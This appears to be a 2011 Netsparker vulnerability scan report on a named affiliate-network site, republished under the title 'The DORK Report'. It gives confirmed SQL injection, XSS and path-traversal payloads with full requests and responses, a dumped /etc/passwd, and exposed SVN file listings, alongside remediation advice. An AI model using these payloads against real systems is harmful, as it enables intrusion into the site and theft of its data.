The DORK Report

Netsparker, Web Application Security Scanner

SQL Injection, Database User Admin, XSS, CWE-89, CWE-79, darkblue.com

Netsparker - Scan Report Summary
TARGET URL: http://darkblue.com/
SCAN DATE: 1/4/2011 11:12:26 AM
REPORT DATE: 2/28/2011 10:16:27 AM
SCAN DURATION: 00:12:59

Total Requests:
Average Speed: req/sec.
21 identified
11 confirmed
2 critical
6 informational

GHDB, DORK Tests
PROFILE: Previous Settings
ENABLED ENGINES: Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

  • CRITICAL: 10 %
  • IMPORTANT: 33 %
  • MEDIUM: 5 %
  • LOW: 24 %
  • INFORMATION: 29 %
Blind SQL Injection
1 TOTAL, CRITICAL, 1 CONFIRMED
SQL Injection occurs when data input, for example by a user, is interpreted as a SQL command rather than as normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL query on the back-end database. In these tests the SQL Injection was not obvious, but the different responses from the page to the injection tests allowed us to identify and confirm it.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can successfully mount one or more of the following types of attack:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for the solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most ORM systems use only parameterised queries, and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
  4. Use your web logs and application logs to see if there was any previous but undetected attack on this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterised queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

- /index.htm CONFIRMED

http://darkblue.com/index.htm?info=1&section=forgotpassword

Parameters

Parameter  Type  Value
info       GET   1
section    GET   forgotpassword
email      POST  -111' OR SLEEP(25)=0 LIMIT 1--
sent       POST  true
submit     POST  3

Request

POST /index.htm?info=1&section=forgotpassword HTTP/1.1
Referer: http://darkblue.com/index.htm?info=1&section=forgotpassword
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: darkblue.com
Content-Length: 66
Accept-Encoding: gzip, deflate

email=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&sent=true&submit=3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:14:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 1014
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/reset.css" /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body><div id="password-retrieval"><h2>Password Retrieval</h2><br /> <p>Your password has been sent to -111' OR SLEEP(25)=0 LIMIT 1-- <br></p> <br /> <p>You may now close this window.</p></div></body></html>
Boolean Based SQL Injection
1 TOTAL, CRITICAL, 1 CONFIRMED
SQL Injection occurs when data input, for example by a user, is interpreted as a SQL command rather than as normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL query on the back-end database. In these tests the SQL Injection was not obvious, but the different responses from the page to the injection tests allowed Netsparker to identify and confirm it.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can successfully mount one or more of the following types of attack:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for the solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most ORM systems use only parameterised queries, and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
  4. Use your web logs and application logs to see if there was any previous but undetected attack on this resource.

Remedy

The best way to protect your code against SQL Injection is to use parameterised queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

- /index.htm CONFIRMED

http://darkblue.com/index.htm?info=1&section=forgotpassword

Parameters

Parameter  Type  Value
info       GET   1
section    GET   forgotpassword
email      POST  ' OR 'ns'='ns
sent       POST  true
submit     POST  3

Request

POST /index.htm?info=1&section=forgotpassword HTTP/1.1
Referer: http://darkblue.com/index.htm?info=1&section=forgotpassword
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: darkblue.com
Content-Length: 40
Accept-Encoding: gzip, deflate

email='+OR+'ns'%3d'ns&sent=true&submit=3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:14:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 996
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/reset.css" /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body><div id="password-retrieval"><h2>Password Retrieval</h2><br /> <p>Your password has been sent to ' OR 'ns'='ns<br></p> <br /> <p>You may now close this window.</p></div></body></html>
Cross-site Scripting
3 TOTAL, IMPORTANT, 3 CONFIRMED
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user, or changing the look of the page by altering the HTML on the fly in order to steal the user's credentials. This happens because input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking users' active sessions
  • Changing the look of the page within the victim's browser
  • Mounting a successful phishing attack
  • Intercepting data and performing man-in-the-middle attacks

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure that all active content is removed before it is presented.

Before sanitising user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs to be defined only once and should be used to sanitise and validate all subsequent input.

There are a number of pre-defined, well-structured white-list libraries available for many different environments; OWASP Reform and the Microsoft Anti-Cross-site Scripting library are good examples.

- /index.htm CONFIRMED

http://darkblue.com/index.htm?info=1&section=forgotpassword

Parameters

Parameter  Type  Value
info       GET   1
section    GET   forgotpassword
email      POST  '"--></style></script><script>alert(0x0000C5)</script>
sent       POST  true
submit     POST  3

Request

POST /index.htm?info=1&section=forgotpassword HTTP/1.1
Referer: http://darkblue.com/index.htm?info=1&section=forgotpassword
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: darkblue.com
Content-Length: 110
Accept-Encoding: gzip, deflate

email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000C5)%3c%2fscript%3e&sent=true&submit=3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:14:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 1102
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/reset.css" /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body><div id="password-retrieval"><h2>Password Retrieval</h2><br /> <p>Could not find account with email as '"--></style></script><script>netsparker(0x0000C5)</script><p><a href="#" onClick="history.go(-1)">Try Again?</a><br></p> <br /> <p>You may now close this window.</p></div></body></html>
- /.svn/text-base/api.php.svn-base CONFIRMED

http://darkblue.com/.svn/text-base/api.php.svn-base?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%..

Parameters

Parameter  Type  Value
nsextt     GET   '"--></style></script><script>alert(0x001179)</script>

Request

GET /.svn/text-base/api.php.svn-base?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001179)%3C%2Fscript%3E HTTP/1.1
Referer: http://darkblue.com/.svn/text-base/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:22:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 151
Content-Type: text/html; charset=UTF-8


<?xml version="1.0" ?><result><error>Unknown command: nsextt= '"--></style></script><script>netsparker(0x001179)</script>()<br/></error></result>
- /.svn/text-base/advSignup.php.svn-base/%22%20stYle=%22x:expre/**/ssion(alert(9)) CONFIRMED

http://darkblue.com/.svn/text-base/advSignup.php.svn-base/%22%20stYle=%22x:expre/**/ssion(alert(9))

Parameters

Parameter  Type     Value
URI-BASED  Raw URI  /" stYle="x:expre/**/ssion(alert(9))

Request

GET /.svn/text-base/advSignup.php.svn-base/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Referer: http://darkblue.com/.svn/text-base/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:22:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 4222
Content-Type: text/html; charset=UTF-8


<!-- Start Left Text Description --> <tr align="left" valign="top"> <td width="100%" height="100%" bgcolor="#FFFFFF"> <table width="100%" border="0" cellspacing="10" cellpadding="0" height="100%"> <tr align="left" valign="top"> <td class=left> <img src="images/welcome.gif" width="102" height="31" alt="Welcome"> <p>Welcome to the darkblue advertiser signup process. <p>Please enter your details and continue<p></td><!-- End left --><!-- Start middle line --> <td class=line width="1"> <img src="images/spacer.gif" width="1" height="1"> </td><!-- End Middle Line --><!-- Start Signup Section --> <td width="500"> <img src="images/starthere.gif" width="87" height="19" alt="Start Here"> <br> <table width="100%" border="0" cellspacing="0" cellpadding="10"> <tr> <td class=signup align="left" valign="top"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td> <img src="images/step01.gif" width="216" height="22" alt="Step 1 of 6: Email Address Verification"> </td> <td align="right" valign="top" width="13"> <a href="help.htm"><img src="images/help.gif" width="13" height="13" border="0" alt="Help"></a> </td> </tr> </table> <p> <form name="form1" method="post" action="/.svn/text-base/advSignup.php.svn-base/" stYle="x:expre/**/ssion(netsparker(9))"> <input type="hidden" name="step" value="2"> <font color="red"><b></b></font><p> Company Name : <br><input class=signuptextfield type="text" name="valArr[companyname]" value="" size="40"><p>Address 1 : <br><input class=signuptextfield type="text" name="valArr[address1]" value="" size="40"><p>Address 2 : <br><input class=signuptextfield type="text" name="valArr[address2]" value="" size="40"><p>City : <br><input class=signuptextfield type="text" name="valArr[city]" value="" size="20"><p>State : <br><input class=signuptextfield type="text" name="valArr[state]" value="" size="5"><p>Zipcode : <br><input class=signuptextfield type="text" name="valArr[zip]" value="" size="10"><p>Country : <br><input class=signuptextfield 
type="text" name="valArr[country]" value="" size="20"><p>Contact Name : <br><input class=signuptextfield type="text" name="valArr[contactname]" value="" size="40"><p>Phone : <br><input class=signuptextfield type="text" name="valArr[phone]" value="" size="40"><p>Email Address (this is also your username) : <br><input class=signuptextfield type="text" name="valArr[email]" value="" size="40"><p> <p> <input class=signupbutton type="submit" name="Back" value=" Back "> <input class=signupbutton type="submit" name="Next" value=" Next "> </form> <p> <p> </td> </tr> </table> </td> </tr> </table> </td> </tr><!-- End Signup Section --><!-- Start Footer --> <tr align="center" valign="middle"> <td width="100%" height="15" class="whitetext" background="images/bottombar.gif"> <span class="lighttext">� 2002 DarkBlue.com | <a class="lightlink" href="termsandconditions.htm">Terms & Conditions</a> | <a class="lightlink" href="privacypolicy.htm">Privacy Policy</a> | <a class="lightlink" href="mailto:customercare@darkblue.com">Contact us</a></span> <img src="images/spacer.gif" width="20" height="15"> </td> </tr></table><!-- End Footer--></body></html>
Local File Inclusion
2 TOTAL, IMPORTANT, 2 CONFIRMED
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into the attacked server page. Netsparker confirmed this issue by reading some files from the target web server.

Impact

Impact can differ based on the exploitation and the read permissions of the web server user. Depending on these factors an attacker might carry out one or more of the following attacks:
  • Gather usernames via the /etc/passwd file
  • Harvest useful information from log files such as "/apache/logs/error.log" or "/apache/logs/access.log"
  • Remotely execute commands by combining this vulnerability with other attack vectors such as a file upload vulnerability or log injection

Remedy

  • If possible, do not accept file paths from input directly. Hard-code the path, or make it selectable from a limited hard-coded list of paths via an index variable.
  • If you definitely need dynamic path concatenation, ensure that you accept only the required characters such as "a-zA-Z0-9" and do not allow "..", "/", "%00" (null byte) or any other similar unexpected characters.
  • Finally, it is important to limit the API to allow inclusion only from one directory and the directories below it. This way you can ensure that any potential attack cannot perform directory traversal.
- /index.htm CONFIRMED

http://darkblue.com/index.htm?info=1&section=../../../../../CANTBEHERE/../../../../../../etc/passwd%00

Parameters

Parameter  Type  Value
info       GET   1
section    GET   ../../../../../CANTBEHERE/../../../../../../etc/passwd

Request

GET /index.htm?info=1&section=../../../../../CANTBEHERE/../../../../../../etc/passwd%00 HTTP/1.1
Referer: http://darkblue.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:14:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 2597
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body>root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrpm:x:37:37::/var/lib/rpm:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinnetdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bashnscd:x:28:28:NSCD Daemon:/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS 
User:/var/lib/nfs:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinpegasus:x:100:500:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologinnamed:x:25:25:Named:/var/named:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashdbs:x:500:100::/home/dbs:/bin/bashmonit:x:101:101:monit daemon:/var/lib/monit:/bin/shdistcache:x:94:94:Distcache:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinrbackup:x:501:501::/home/rbackup:/bin/sh</body></html>
- /index.htm CONFIRMED

http://darkblue.com/index.htm?info=1&section=../../../../../CANTBEHERE/../../../../../../etc/passwd%00

Parameters

Parameter  Type  Value
info       GET   1
section    GET   ../../../../../CANTBEHERE/../../../../../../etc/passwd
email      POST  netsparker@example.com
sent       POST  true
submit     POST  3

Request

POST /index.htm?info=1&section=../../../../../CANTBEHERE/../../../../../../etc/passwd%00 HTTP/1.1
Referer: http://darkblue.com/index.htm?info=1&section=forgotpassword
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: darkblue.com
Content-Length: 49
Accept-Encoding: gzip, deflate

email=netsparker%40example.com&sent=true&submit=3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:14:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 2597
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body>root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrpm:x:37:37::/var/lib/rpm:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinnetdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bashnscd:x:28:28:NSCD Daemon:/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS 
User:/var/lib/nfs:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinpegasus:x:100:500:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologinnamed:x:25:25:Named:/var/named:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashdbs:x:500:100::/home/dbs:/bin/bashmonit:x:101:101:monit daemon:/var/lib/monit:/bin/shdistcache:x:94:94:Distcache:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinrbackup:x:501:501::/home/rbackup:/bin/sh</body></html>
SVN Disclosure
1 TOTAL, IMPORTANT
Netsparker discovered an SVN repository file.

Impact

SVN repository files can disclose SVN addresses, SVN usernames and date information. While disclosures of this type do not provide a direct attack opportunity, they can be useful to an attacker when combined with other vulnerabilities or during the exploitation of other vulnerabilities.

Remedy

Do not leave SVN Repository files on development environments. If there is a business requirement to do so, implement access control mechanisms to stop public access to SVN Repository files.
- /.svn/all-wcprops

http://darkblue.com/.svn/all-wcprops

Request

GET /.svn/all-wcprops HTTP/1.1
Referer: http://darkblue.com/.svn/all-wcprops
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:12:19 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 08 Nov 2010 00:35:53 GMT
ETag: "6880ce-38f1-ce7e8c40"
Accept-Ranges: bytes
Content-Length: 14577
Content-Type: text/plain; charset=UTF-8


K 25svn:wc:ra_dav:version-urlV 46/dbs/!svn/ver/39652/darkblue/branches/live/wwwENDbanners.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/banners.htmENDpenguins.htmK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/penguins.htmENDdarkblue.cssK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/darkblue.cssENDICQ.gifK 25svn:wc:ra_dav:version-urlV 54/dbs/!svn/ver/38013/darkblue/branches/live/www/ICQ.gifENDerror.htmK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38013/darkblue/branches/live/www/error.htmENDxbTreeWidgetStatic.jsK 25svn:wc:ra_dav:version-urlV 68/dbs/!svn/ver/38013/darkblue/branches/live/www/xbTreeWidgetStatic.jsENDkb-style.cssK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/kb-style.cssENDremittance.phpK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/remittance.phpENDconfirm.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/confirm.htmENDprivacypolicy.htmK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/privacypolicy.htmENDwebhosting_signup.htmK 25svn:wc:ra_dav:version-urlV 68/dbs/!svn/ver/38013/darkblue/branches/live/www/webhosting_signup.htmENDunsorted.pngK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/unsorted.pngENDadvSignup.phpK 25svn:wc:ra_dav:version-urlV 60/dbs/!svn/ver/38013/darkblue/branches/live/www/advSignup.phpENDadvindex.htmK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/advindex.htmENDimages.phpK 25svn:wc:ra_dav:version-urlV 57/dbs/!svn/ver/38013/darkblue/branches/live/www/images.phpENDtermsandconditions.phpK 25svn:wc:ra_dav:version-urlV 69/dbs/!svn/ver/38013/darkblue/branches/live/www/termsandconditions.phpENDaffiliates.cssK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/affiliates.cssENDtermsandconditions.htmK 
25svn:wc:ra_dav:version-urlV 69/dbs/!svn/ver/38013/darkblue/branches/live/www/termsandconditions.htmENDMSN.gifK 25svn:wc:ra_dav:version-urlV 54/dbs/!svn/ver/38013/darkblue/branches/live/www/MSN.gifENDaddSite.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/addSite.htmENDmovesort.curK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/movesort.curENDprefs.htmK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38013/darkblue/branches/live/www/prefs.htmENDindex_new.htmK 25svn:wc:ra_dav:version-urlV 60/dbs/!svn/ver/38013/darkblue/branches/live/www/index_new.htmENDunsorted.gifK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/unsorted.gifENDstat.wmlK 25svn:wc:ra_dav:version-urlV 55/dbs/!svn/ver/38013/darkblue/branches/live/www/stat.wmlENDgstat.htmK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38013/darkblue/branches/live/www/gstat.htmENDsortdesc.pngK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/sortdesc.pngENDforgotpassword.htmK 25svn:wc:ra_dav:version-urlV 65/dbs/!svn/ver/38013/darkblue/branches/live/www/forgotpassword.htmENDcPayout.phpK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/cPayout.phpENDadvfrontpage_subpage.phpK 25svn:wc:ra_dav:version-urlV 71/dbs/!svn/ver/38013/darkblue/branches/live/www/advfrontpage_subpage.phpENDhelp.htmK 25svn:wc:ra_dav:version-urlV 55/dbs/!svn/ver/38013/darkblue/branches/live/www/help.htmENDhealth_signup.htmK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/health_signup.htmENDdating_signup.htmK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/dating_signup.htmENDbalanceDetails.htmK 25svn:wc:ra_dav:version-urlV 65/dbs/!svn/ver/38013/darkblue/branches/live/www/balanceDetails.htmENDadvtermsandconditions_adult.htmK 25svn:wc:ra_dav:version-urlV 
